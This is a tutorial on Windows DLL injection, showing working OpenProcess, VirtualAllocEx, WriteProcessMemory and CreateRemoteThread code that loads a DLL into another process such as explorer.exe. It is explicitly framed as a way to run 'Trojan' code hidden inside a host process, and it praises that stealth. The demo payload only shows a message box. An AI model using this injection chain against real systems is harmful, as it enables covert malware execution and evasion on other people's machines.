Remote thread technology means entering another process's address space by creating a thread inside that process. Within a process we can use CreateThread to create a thread; the new thread shares the address space and other resources with the main thread (the thread created automatically when the process starts). Less well known is that CreateRemoteThread can create a new thread inside a different process, and that remote thread likewise shares the address space of the remote process. In other words, through a remote thread we enter the remote process's address space and run with the privileges of that remote process. Starting a DLL Trojan inside it is then trivial compared with getting into the process in the first place: once inside, we can tamper with the remote process's data at will.
First, we use OpenProcess to open the process we want to inject into. If the remote process cannot be opened, the injection fails; this is usually caused by insufficient access rights, and the fix is to raise the privileges of the local process (for example by enabling SeDebugPrivilege in its token, which requires an administrator account).

    hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD |   // allow remote thread creation
                                 PROCESS_VM_OPERATION |    // allow remote VM operations
                                 PROCESS_VM_WRITE,         // allow remote VM writes
                                 FALSE, dwRemoteProcessID);

Because we need to write into the remote process's address space and create a remote thread there, we must request sufficient access rights (PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_WRITE). On current Windows versions the documented access set for CreateRemoteThread also includes PROCESS_QUERY_INFORMATION and PROCESS_VM_READ, so request those as well if OpenProcess succeeds but CreateRemoteThread fails with ERROR_ACCESS_DENIED.
Next we create a remote thread whose start routine is LoadLibraryW, which loads our Trojan DLL. LoadLibraryW is exported by kernel32.dll and loads a DLL file. It takes a single parameter, pszLibFileName, the absolute path of the DLL file (the full path of the Trojan DLL), and this is exactly why it can serve as a thread start routine: its signature (one pointer argument) matches what CreateRemoteThread expects. Because LoadLibraryW will run in the remote process, the file name must first be copied into the remote address space; otherwise the remote thread cannot read its parameter:

    // compute the memory needed for the DLL path name (including the terminating NUL)
    int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
    // use VirtualAllocEx to allocate a buffer for the DLL file name in the remote process's address space
    pszLibFileRemote = (PWSTR)VirtualAllocEx(hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
    // use WriteProcessMemory to copy the DLL path name into the remote process's memory
    iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID)pszLibFileName, cb, NULL);
    // compute the entry address of LoadLibraryW
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");

Note the parenthesisation of the size calculation: the string length plus one for the terminating NUL, then multiplied by sizeof(WCHAR); multiplying before adding one would allocate a buffer one byte too small and truncate the path.
Everything is ready. We create the remote thread with pfnStartAddr (the entry address of LoadLibraryW, which is valid in the remote process because kernel32.dll is mapped at the same base address in every process of the same boot session) as its start address and pszLibFileRemote (the copy of the Trojan DLL's full path we just wrote) as its parameter, which starts our Trojan DLL inside the remote process:

    // start the remote thread at LoadLibraryW, which loads the user's DLL inside the remote process
    hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);
At this point the remote injection is complete. To check whether our DLL really runs inside the remote process, I compiled the following test DLL. (Its DllMain runs under the loader lock, so a real payload should do as little as possible there and hand off to its own thread; the MessageBox call is adequate for a demonstration.)

    #include <windows.h>
    #include <stdlib.h>

    BOOL APIENTRY DllMain(HANDLE hModule, DWORD reason, LPVOID lpReserved)
    {
        char szProcessId[64];
        switch (reason)
        {
        case DLL_PROCESS_ATTACH:
            // get the ID of the current (host) process and show it
            _itoa(GetCurrentProcessId(), szProcessId, 10);
            MessageBox(NULL, szProcessId, "RemoteDLL", MB_OK);
            break;
        default:
            break;
        }
        return TRUE;
    }
When I use the RmtDll.exe program to inject this TestDLL.dll into the explorer.exe process (PID = 1208), the test DLL pops up a message box showing 1208, and the PS tool also shows the DLL in the process's module list:

    Process ID: 1208
    C:\WINNT\explorer.exe (0x00400000)
    ......
    C:\TestDLL.dll (0x10000000)
    ......

This proves that TestDLL.dll has been loaded and executed inside the explorer.exe process.
Whether a Trojan DLL or a remote thread is used, the Trojan's core code runs inside the address space of another process. This not only hides it well (no process of its own appears in the process list) but also protects it better, since killing it means killing the host process.